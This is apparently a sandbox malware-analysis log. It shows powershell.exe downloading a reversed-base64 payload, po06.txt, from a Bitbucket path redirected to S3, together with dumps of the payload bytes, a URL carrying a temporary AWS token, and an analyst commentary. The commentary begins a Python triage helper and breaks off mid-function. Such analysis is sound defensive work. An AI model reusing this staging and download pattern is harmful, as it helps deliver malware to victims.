                                                        2024-10-07 07:33:17 UTC1378INData Raw: 3f b5 18 2b bc f6 a8 da f9 16 47 0d ac 6e 03 fa 69 56 57 dc 83 04 18 34 d8 28 20 00 49 1e 74 b0 54 2b b4 45 03 58 09 31 c2 14 0a 07 90 a5 d0 ae 4f 95 35 4a a4 7d 7f 7a 55 2a 93 1f bd 03 09 34 3a 42 e5 30 3b 93 cd 28 95 10 78 33 14 d9 b5 40 e0 c1 14 aa 54 24 fa 8f 5a 58 10 e1 b3 b7 ce 67 f2 a5 52 e7 3c 02 60 f9 53 54 ab cb bf b4 c5 2a 90 01 f2 83 ef 34 d8 10 bb 6a 80 79 e4 51 8f cc 41 fc e9 10 41 12 3c fd e9 44 90 63 c8 c4 9f f4 a6 7d b0 23 d1 25 5d f8 f7 ef 47 e3 68 af 22 3b c0 04 fa d1 86 d2 3b a6 83 68 80 42 8f a7 71 3d e9 4a 22 40 e4 00 3c c5 1b 77 27 91 34 62 0a 55 27 b4 48 a2 a1 26 62 40 8e 38 a5 76 89 07 89 14 55 40 24 7f d2 90 82 44 93 c0 fa d0 29 a0 7b 44 f9 51 f6 03 e9 35 ef 0a 3f aa 69 26 21 12 80 13 27 99 1e bd e8 54 c8 13 3e 7e 54 b1 40 88 f9
                                                        Data Ascii: ?+GniVW4( ItT+EX1O5J}zU*4:B0;(x3@T$ZXgR<`ST*4jyQAA<Dc}#%]Gh";;hBq=J"@<w'4bU'H&b@8vU@$D){DQ5?i&!'T>~T@
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 41 23 ca 8c 1d 05 3c 18 33 14 44 93 34 1d bd c7 a5 30 85 12 b1 30 a5 1e 3f 4a 38 56 e4 81 c7 14 88 85 7c aa 23 8f 5e c6 8c 95 80 38 23 f2 a5 81 64 5f 77 b8 a2 ee e6 29 30 e9 3b 62 62 6b c8 78 83 c8 e6 69 0b 2f c0 af cb b6 37 76 f6 a3 12 12 3b 9f a5 25 b8 ab 90 27 8f 5a 12 e4 00 20 c5 2e 3c 8e a4 c3 a8 84 09 92 68 15 09 04 03 df da 8a 54 20 c8 91 ee 68 a5 7e a3 f2 a7 e3 c0 fb 83 a8 f3 cc fb d1 16 a0 0c 02 4f ed 5e 52 80 4f 30 7e b4 91 5e d3 db b1 a6 19 b0 54 a0 39 07 b7 94 51 54 47 3c f7 34 05 5e 87 bd 11 4a 1b a0 77 34 86 c8 68 f5 fa 77 ef 49 ba 47 20 f9 d0 a9 65 22 7f 6a 49 6b e7 d7 db d2 9d 21 09 38 47 ac c5 37 74 00 47 33 12 69 57 48 3e 5c 76 22 90 58 f2 f2 3c 77 a2 42 1b 3b 11 04 09 a4 5c 02 0f b5 2e e1 32 63 69 fa d2 0e 73 23 c8 fe f5 24 44 35 58 e0
                                                        Data Ascii: A#<3D400?J8V|#^8#d_w)0;bbkxi/7v;%'Z .<hT h~O^RO0~^T9QTG<4^Jw4hwIG e"jIk!8G7tG3iWH>\v"X<wB;\.2cis#$D5X


                                                        Session ID:1
                                                        Source IP:192.168.2.6
                                                        Source Port:49752
                                                        Destination IP:185.166.143.48
                                                        Destination Port:443
                                                        PID:5664
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        2024-10-07 07:33:21 UTC  100  OUT  GET /rulmerurk/ertertqw/downloads/po06.txt HTTP/1.1
                                                        Host: bitbucket.org
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:33:22 UTC  5118  IN  HTTP/1.1 302 Found
                                                        Date: Mon, 07 Oct 2024 07:33:22 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 0
                                                        Server: AtlassianEdge
                                                        Location: https://bbuseruploads.s3.amazonaws.com/4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu [TRUNCATED]
                                                        Expires: Mon, 07 Oct 2024 07:33:22 GMT
                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                        X-Used-Mesh: False
                                                        Vary: Accept-Language, Origin
                                                        Content-Language: en
                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                        X-Dc-Location: Micros-3
                                                        X-Served-By: 61e51e47dd6f
                                                        X-Version: 8e66bccd2be3
                                                        X-Static-Version: 8e66bccd2be3
                                                        X-Request-Count: 1116
                                                        X-Render-Time: 0.046785831451416016
                                                        X-B3-Traceid: 0808a1647fb24c5cafa43d7dd1facf45
                                                        X-B3-Spanid: 707e33c580f68fff
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassi [TRUNCATED]
                                                        X-Usage-Quota-Remaining: 999227.518
                                                        X-Usage-Request-Cost: 786.33
                                                        X-Usage-User-Time: 0.016543
                                                        X-Usage-System-Time: 0.007047
                                                        X-Usage-Input-Ops: 0
                                                        X-Usage-Output-Ops: 0
                                                        Age: 0
                                                        X-Cache: MISS
                                                        X-Content-Type-Options: nosniff
                                                        X-Xss-Protection: 1; mode=block
                                                        Atl-Traceid: 0808a1647fb24c5cafa43d7dd1facf45
                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                        Server-Timing: atl-edge;dur=157,atl-edge-internal;dur=4,atl-edge-upstream;dur=155,atl-edge-pop;desc="aws-eu-central-1"
                                                        Connection: close


                                                        Session ID:2
                                                        Source IP:192.168.2.6
                                                        Source Port:49760
                                                        Destination IP:16.182.70.97
                                                        Destination Port:443
                                                        PID:5664
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp  Bytes transferred  Direction  Data
                                                        2024-10-07 07:33:22 UTC  1211  OUT  GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/74ccc5a3-8670-44b3-9024-14d063289113/po06.txt?response-content-disposition=attachment%3B%20filename%3D%22po06.txt%22&AWSAccessKeyId=ASIA6KOSE3BNNNEIOJI2&Signature=fCrW6YnKz8vmM76pCMU1Lk6%2B0dU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEND%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCICDb1Ea51gVsaGyPokV768I%2BK7TQ4cMsw7V4s%2FwUh97nAiBfdiFFLnmsdf8uWYy0kPYgU%2BjMX%2FMgGviikn58Zb6gxSqnAggpEAAaDDk4NDUyNTEwMTE0NiIMEI%2Blc%2FDMHYEVRHAGKoQCqgEqCyiV%2B3l1ji%2BADbqxjQAkgbvr1wtWBW6I%2Bw1MhCD7Mxv3%2FnNWt0uV09RjUnN81299oEf01aBbcdjn3LrJzVv26PtJlSKA4XjDjqHgt4WeXq%2F%2F7hJG0lFt4RXCCuJfQAEzhCNvyxwS3W5h8kafeCHdboWlzk8hyBUMfK0fthLTcWdKoCk30MyOhCiCmW%2BRSyT76Oe%2B8IBbx%2BUcOZRFmnl4rOdx52%2BSbzegdvcQ%2Bkh1z8AYQYnRivhT30A68B9NHLHz%2BuOQbnY6gwwwc1%2FyoVHP99bN6P2wqC9yeGkEPPkenaL1k0WzLcky5ZyHMjM09U2H3sUzWWlYKmC9oxgP8RlWKagw%2F5mOuAY6ngFo9w%2BuVBeGNn0os%2F2bZJZ9Z%2BD0%2B8YeClr2VvBYCCC1utxLfr9vLLLpP2dO9iTdu0Tdh13%2B8JebIVXg3As%2BHgx7cfu0QDWzRjYpiFcJf1LqlV%2BkrHMKyohVoC%2FlxeRSvJA [TRUNCATED]
                                                        Host: bbuseruploads.s3.amazonaws.com
                                                        Connection: Keep-Alive
                                                        2024-10-07 07:33:23 UTC  523  IN  HTTP/1.1 200 OK
                                                        x-amz-id-2: lpOZKJ1koLdC2uzcmaChljIOh7bl/YvMqXXACFXgBRJizZMQ0gRH+W9fqfVHVj8oTTCSZGzbjkQ=
                                                        x-amz-request-id: QNRNG3NJ4WTVTVK1
                                                        Date: Mon, 07 Oct 2024 07:33:23 GMT
                                                        Last-Modified: Sun, 06 Oct 2024 19:44:00 GMT
                                                        ETag: "25ed80d3edc48423314bfde9f7f6a668"
                                                        x-amz-server-side-encryption: AES256
                                                        x-amz-version-id: C6L29JZ7e76hnMP4VYZTCoElKv867tPG
                                                        Content-Disposition: attachment; filename="po06.txt"
                                                        Accept-Ranges: bytes
                                                        Content-Type: text/plain
                                                        Server: AmazonS3
                                                        Content-Length: 626996
                                                        Connection: close
                                                        2024-10-07 07:33:23 UTC15770INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                        Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 51 51 49 69 41 43 42 69 4d 53 49 45 4d 79 49 68 51 41 4a 6b 4d 43 42 6c 55 43 4a 45 59 79 4a 6c 51 51 4b 70 67 43 42 72 73 69 4b 45 30 53 4c 73 51 77 4c 76 34 43 42 79 49 54 4d 45 51 44 4e 7a 51 67 4e 32 55 44 42 35 6b 44 4f 45 6f 6a 4f 35 51 41 50 38 73 44 42 39 30 54 50 49 63 7a 4e 32 51 77 4e 33 59 6a 63 36 6f 54 4f 6f 48 57 59 67 39 65 72 54 67 44 69 4c 75 49 38 4b 71 6f 69 77 76 34 69 4c 43 66 6a 4d 79 49 38 4f 36 59 6a 77 48 5a 6b 50 43 76 6b 53 4b 4a 38 52 4b 5a 6b 77 37 6f 6a 4e 43 2f 69 4c 71 49 38 49 69 34 68 77 58 59 68 46 43 50 68 45 4f 49 38 44 53 34 67 76
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAQQIiACBiMSIEMyIhQAJkMCBlUCJEYyJlQQKpgCBrsiKE0SLsQwLv4CByITMEQDNzQgN2UDB5kDOEojO5QAP8sDB90TPIczN2QwN3Yjc6oTOoHWYg9erTgDiLuI8Kqoiwv4iLCfjMyI8O6YjwHZkPCvkSKJ8RKZkw7ojNC/iLqI8Ii4hwXYhFCPhEOI8DS4gv
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 79 2f 6e 67 69 4a 2f 6a 53 4b 6e 38 76 4b 71 6b 79 2f 72 77 69 4b 2f 33 53 4c 73 38 2f 4c 76 34 79 2f 78 45 44 4d 2f 4c 6a 4d 78 38 50 4e 30 4d 7a 2f 32 59 54 4e 2f 6a 44 4f 33 38 76 4f 36 6b 7a 2f 37 73 6a 4f 2f 33 54 50 38 38 76 50 65 72 54 67 44 34 7a 2f 2f 41 30 50 2f 48 55 51 41 39 76 51 43 46 30 2f 43 4a 6b 51 2f 4c 30 51 43 39 76 51 43 4a 30 2f 42 46 55 51 2f 44 45 51 41 39 2f 50 2f 38 7a 2f 65 72 54 67 44 30 54 50 2f 7a 44 50 37 38 76 4f 36 6b 7a 2f 35 6b 44 4f 2f 66 7a 4e 32 38 66 4e 31 51 7a 2f 7a 4d 6a 4d 2f 48 54 4d 77 38 50 4d 77 38 79 2f 75 34 53 4c 2f 7a 53 4c 72 38 2f 4b 72 6f 79 2f 70 6b 43 4b 2f 6a 43 4b 6e 38 2f 4a 6e 59 79 2f 6d 59 53 4a 2f 58 53 4a 6b 38 50 4a 6b 49 79 2f 6a 51 69 49 2f 50 43 4a 69 38 76 49 6a 45 43 6d 70 6b 79 4a 41
                                                        Data Ascii: y/ngiJ/jSKn8vKqky/rwiK/3SLs8/Lv4y/xEDM/LjMx8PN0Mz/2YTN/jDO38vO6kz/7sjO/3TP88vPerTgD4z//A0P/HUQA9vQCF0/CJkQ/L0QC9vQCJ0/BFUQ/DEQA9/P/8z/erTgD0TP/zDP78vO6kz/5kDO/fzN28fN1Qz/zMjM/HTMw8PMw8y/u4SL/zSLr8/Kroy/pkCK/jCKn8/JnYy/mYSJ/XSJk8PJkIy/jQiI/PCJi8vIjECmpkyJA
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 54 43 4a 69 38 66 4a 6c 4d 79 2f 6e 63 53 4a 2f 6e 53 4b 6e 38 2f 4b 72 6b 79 2f 75 30 43 4c 2f 48 54 4d 76 38 50 4e 7a 49 7a 2f 34 63 54 4e 2f 76 7a 4f 35 38 66 51 41 35 7a 2f 47 56 30 51 2f 76 30 53 4a 39 76 55 52 42 31 2f 59 68 31 56 2f 44 47 59 65 39 50 5a 6b 4a 32 2f 64 78 31 57 2f 62 56 56 55 39 2f 54 50 31 30 2f 4a 6c 30 52 2f 54 30 51 42 39 2f 50 65 72 54 67 44 30 7a 2f 36 6f 44 4f 2f 62 6a 4e 30 38 2f 4d 7a 45 7a 2f 77 41 6a 4c 2f 33 53 4c 72 38 2f 4b 72 6b 79 2f 70 67 79 4a 2f 66 79 4a 6c 38 66 4a 6c 51 79 2f 6b 51 69 49 2f 54 43 4a 69 38 50 4a 6b 49 79 2f 6b 51 69 49 2f 54 43 4a 69 38 50 4a 6b 49 79 2f 6b 51 69 49 2f 54 43 4a 69
                                                        Data Ascii: y/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/TCJi8fJlMy/ncSJ/nSKn8/Krky/u0CL/HTMv8PNzIz/4cTN/vzO58fQA5z/GV0Q/v0SJ9vURB1/Yh1V/DGYe9PZkJ2/dx1W/bVVU9/TP10/Jl0R/T0QB9/PerTgD0z/6oDO/bjN08/MzEz/wAjL/3SLr8/Krky/pgyJ/fyJl8fJlQy/kQiI/TCJi8PJkIy/kQiI/TCJi8PJkIy/kQiI/TCJi
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 54 67 44 39 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 38 6a 4d 53 49 64 4d 79 49 68 41 41 41 41 41 51 41 6a 4d 53 49 55 4f 79 49 68 30 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 70 6b 69 4a 2f 54 65 72 54 67 44 34 6a 2f 76 39 32 66 2f 2f 32
                                                        Data Ascii: TgD9/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy8jMSIdMyIhAAAAAQAjMSIUOyIh0/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/pkiJ/TerTgD4j/v92f//2
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 66 65 72 54 67 44 2f 6e 66 65 72 54 67 44 35 2f 66 65 72 54 67 44 35 6e 2f 2f 35 6e 66 65 72 54 67 44 2f 72 66 65 72 54 67 44 35 2f 66 65 72 54 67 44 35 6e 2f 2f 35 6e 66 65 72 54 67 44 2f 6e 66 65 72 54 67 44 35 2f 76 65 72 54 67 44 36 72 2f 2f 36 72 76 65 72 54 67 44 2f 72 76 65 72 54 67 44 36 2f 2f 65 72 54 67 44 36 72 2f 2f 37 76 2f 65 72 54 67 44 2f 76 2f 65 72 54 67 44 37 2f 76 65 72 54 67 44 36 72 2f 2f 36 72 2f 65 72 54 67 44 2f 76 2f 65 72 54 67 44 37 2f 2f 65 72 54 67 44 37 72 2f 2f 37 76 2f 65 72 54 67 44 2f 7a 2f 65 72 54 67 44 37 2f 50 2f 38 7a 2f 2f 38 7a 50 2f 2f 7a 50 2f 38 2f 50 2f 38 76 2f 2f 37 76 50 2f 2f 7a 2f 65 72 54 67 44 38 2f 2f 65 72 54 67 44 37 7a 2f 2f 38 7a 50 2f 2f 7a 50 2f 38 2f 50 2f 38 33 2f 2f 38 7a 50 2f 2f 2f 33 66 65
                                                        Data Ascii: ferTgD/nferTgD5/ferTgD5n//5nferTgD/rferTgD5/ferTgD5n//5nferTgD/nferTgD5/verTgD6r//6rverTgD/rverTgD6//erTgD6r//7v/erTgD/v/erTgD7/verTgD6r//6r/erTgD/v/erTgD7//erTgD7r//7v/erTgD/z/erTgD7/P/8z//8zP//zP/8/P/8v//7vP//z/erTgD8//erTgD7z//8zP//zP/8/P/83//8zP///3fe
                                                        2024-10-07 07:33:23 UTC1024INData Raw: 2f 34 6a 50 65 72 54 67 44 2f 53 4c 74 30 2f 37 73 7a 4f 2f 66 31 55 54 39 2f 53 4c 74 30 2f 7a 4d 7a 4d 2f 50 7a 4d 33 38 2f 53 4c 74 30 2f 76 39 32 62 2f 50 31 55 54 39 2f 4a 6e 63 79 2f 54 39 30 54 2f 76 79 4b 72 38 2f 62 76 39 32 2f 2f 39 33 66 2f 50 79 49 6a 38 2f 59 6a 4e 32 2f 50 39 30 55 2f 50 30 51 44 39 2f 54 50 74 30 2f 54 4e 31 55 2f 76 31 57 62 39 2f 31 58 66 39 2f 58 76 39 31 2f 76 39 31 62 2f 2f 32 62 76 39 2f 48 6f 67 42 65 72 54 67 44 2f 4b 72 6f 79 2f 70 6b 43 4b 2f 6a 53 4b 6e 38 50 4b 6f 63 79 2f 6e 63 69 4a 2f 62 79 4a 6c 38 76 4a 6d 51 79 2f 6c 55 43 4a 2f 54 53 4a 6a 38 50 4a 6b 49 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 38 2f 49 6a 45 79 2f 6a 4d 53 49 2f 50 79 49 68 34 2f 49 6a 45 79 4a 6a
                                                        Data Ascii: /4jPerTgD/SLt0/7szO/f1UT9/SLt0/zMzM/PzM38/SLt0/v92b/P1UT9/Jncy/T90T/vyKr8/bv92//93f/PyIj8/YjN2/P90U/P0QD9/TPt0/TN1U/v1Wb9/1Xf9/Xv91/v91b//2bv9/HogBerTgD/Kroy/pkCK/jSKn8PKocy/nciJ/byJl8vJmQy/lUCJ/TSJj8PJkIy/jMSI/PyIh8/IjEy/jMSI/PyIh8/IjEy/jMSI/PyIh4/IjEyJj
                                                        2024-10-07 07:33:23 UTC16384INData Raw: 65 72 54 67 44 2f 6d 62 75 35 2f 4c 75 34 68 2f 50 36 6f 6a 65 72 54 67 44 2f 6d 62 75 35 2f 76 65 72 54 67 44 36 72 2f 2f 36 72 76 65 72 54 67 44 2f 68 48 65 34 2f 66 65 72 54 67 44 35 6e 2f 66 35 6c 58 65 72 54 67 44 2f 6a 50 75 34 2f 54 4f 35 6b 2f 2f 36 72 76 65 72 54 67 44 2f 6d 62 75 35 2f 7a 4f 37 72 2f 66 36 71 6e 65 72 54 67 44 2f 6b 54 4f 35 2f 76 65 72 54 67 44 36 72 2f 66 34 68 48 65 72 54 67 44 2f 73 7a 4f 37 2f 4c 75 34 69 2f 50 36 6f 6a 65 72 54 67 44 2f 72 76 65 72 54 67 44 36 2f 62 65 72 54 67 44 35 6e 2f 50 37 73 7a 65 72 54 67 44 2f 73 7a 65 37 2f 6a 65 36 70 2f 66 37 74 33 65 72 54 67 44 2f 73 33 4f 37 2f 33 65 37 74 2f 2f 37 77 44 2f 2f 74 33 65 37 2f 6e 65 36 70 2f 50 38 77 44 2f 2f 31 58 66 39 2f 58 76 39 32 2f 66 39 31 58 2f 2f 32
                                                        Data Ascii: erTgD/mbu5/Lu4h/P6ojerTgD/mbu5/verTgD6r//6rverTgD/hHe4/ferTgD5n/f5lXerTgD/jPu4/TO5k//6rverTgD/mbu5/zO7r/f6qnerTgD/kTO5/verTgD6r/f4hHerTgD/szO7/Lu4i/P6ojerTgD/rverTgD6/berTgD5n/P7szerTgD/sze7/je6p/f7t3erTgD/s3O7/3e7t//7wD//t3e7/ne6p/P8wD//1Xf9/Xv92/f91X//2
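Two things in sessions 1 and 2 above are worth pinning down before treating anything as an indicator. The Location header hands off to a presigned S3 URL carrying temporary credentials (an ASIA… access key and an x-amz-security-token in the query string), so the S3 URL itself is not a durable IOC; the bitbucket.org download path and the object's hash are (if the object was uploaded in a single part under SSE-S3, as the headers suggest, the ETag 25ed80d3edc48423314bfde9f7f6a668 is its MD5). And the 626,996-byte text/plain body begins with "=" followed by a long run of "A": base64 padding belongs at the end of a string, so padding at the start is the usual sign of a blob stored backwards that the loader reverses before decoding. The helper below is an added example, not Joe Sandbox's code or the sample's, and it runs on a constructed stand-in (a 128-byte fake DOS/NT header, base64-encoded and reversed) rather than the real po06.txt, about whose decoded content this page says nothing; the record keys used by suspicious_fetch are the example's own labels for the session and header columns.

```python
"""Triage helpers for a script-host download that looks like reversed base64."""
import base64
import binascii
import string

_B64_CHARS = set(string.ascii_letters + string.digits + "+/=")


def _strip(text: str) -> str:
    """Drop whitespace; encoded blobs are often line-wrapped."""
    return "".join(text.split())


def looks_like_base64(text: str) -> bool:
    """Only base64 alphabet characters and a length that is a multiple of 4."""
    s = _strip(text)
    return len(s) >= 4 and len(s) % 4 == 0 and all(c in _B64_CHARS for c in s)


def is_reversed_base64(text: str) -> bool:
    """Padding belongs at the END of base64; a blob that fits the alphabet but
    starts with '=' was written backwards. Unpadded originals are not caught
    here, so decode_blob tries both orientations anyway."""
    s = _strip(text)
    return looks_like_base64(s) and s.startswith("=") and not s.endswith("=")


def classify_bytes(data: bytes) -> str:
    """'pe' for MZ + e_lfanew pointing at 'PE\\0\\0', 'mz' for a bare DOS
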